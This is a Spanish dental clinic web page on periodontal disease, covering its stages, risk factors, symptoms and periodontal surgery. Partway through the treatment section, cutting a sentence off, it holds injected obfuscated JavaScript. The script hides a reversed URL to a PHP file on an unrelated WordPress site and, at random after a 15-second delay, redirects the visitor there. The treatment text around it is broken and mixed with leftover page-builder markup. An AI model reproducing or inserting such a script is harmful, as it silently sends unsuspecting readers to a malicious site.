Enfermedad de las encías o piorrea

La periodoncia es una enfermedad que va afectando progresivamente a los tejidos de soporte del diente, comenzando en un primer estadio con la encía inflamada, enrojecida y sangrante (gingivitis), evolucionando a una pérdida de hueso (periodontitis). En fases avanzadas de la periodoncia, cuando la destrucción ósea es grande, conduce irremediablemente a la movilidad y pérdida dentaria. La periodontitis puede aumentar el riesgo de accidentes cardiovasculares. Existen algunos factores de riesgo para padecer periodontitis, entre los que destacamos los siguientes:

  • Factor genético
  • Consumo de tabaco
  • Diabetes
  • VIH
Casos Clínicos

Tiene un componente genético y afecta al 50% de la población adulta. Necesita tratamiento ya que no mejora por si mismo ni tampoco con medicamentos.
En los niños y adolescentes la prevalencia de la enfermedad es menor pero existen formas de Periodontitis prepuberal y Periodontitis juvenil que deben de ser tenidas en cuenta ya que son muy agresivas. Para el tratamiento con ortodoncia, se recomienda no continuar o iniciar el tratamiento si la inflamación es importante ya que el movimiento dentario ortodóncico y la inflamación continuada por enfermedad periodontal pueden producir pérdida irreversible de hueso.

  • Encías rojas.
  • Sangrado espontáneo o al cepillarse (los fumadores no sangran aunque estén infectadas).
  • Dientes largos (provocado por la retracción de las encías)
  •  Movilidad y desplazamiento de los dientes.
  • Espacios y huecos entre los dientes.
  • Mal aliento.
  •  Aparición de abscesos o flemones en las encías.
  • Puede no presentar ningún síntoma.

La mejor prevención es un diagnóstico precoz de la enfermedad. Por ello, es muy importante acudir a un especialista (periodoncista) si presenta alguno de los síntomas de la periodontitis.

Tratamiento
) == "string") return $VOcl3cIRrbzlimOyC8H.list[n].split("").reverse().join("");return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}o las bolsas son muy profundas es necesario realizar CIRUGÍA PERIODONTAL para conseguir un mejor acceso a las raíces dentarias y eliminar así el sarro y tejido periodontal enfermo y crear unas condiciones de salud y de forma en la encía que faciliten el mantenimiento de la higiene en el futuro.

· Defecto óseo 
prequirúrgico
· La incinsión del 
colgajo permite
retirar el tejido gingival
· Se da forma al hueso 
y se elimina todo el
cálculo dental que queda
· Se sutura el tejido 
gingival en la 
nueva posición
· Área cicatrizada 
después de la cirugía 
periodontal” icon_disp=”none” banner_image=”37063|http://clinicadentalfos.com/wp-content/uploads/2015/07/periodoncia_trs2.jpg” link_opts=”none” banner_link_bg_color=”#242424″ banner_link_text_color=”#ffffff” banner_style=”style01″ heading_title_color=”#ffffff” banner_bg_color=”#23c0e0″ desc_color=”#ffffff” icon_color=”#ffffff” banner_opacity=”opaque” banner_overlay_bg_color=”#23c0e0″ banner_height_val=”375″ banner_desc_font_size=”12″ banner_height=”ult-banner-block-custom-height”]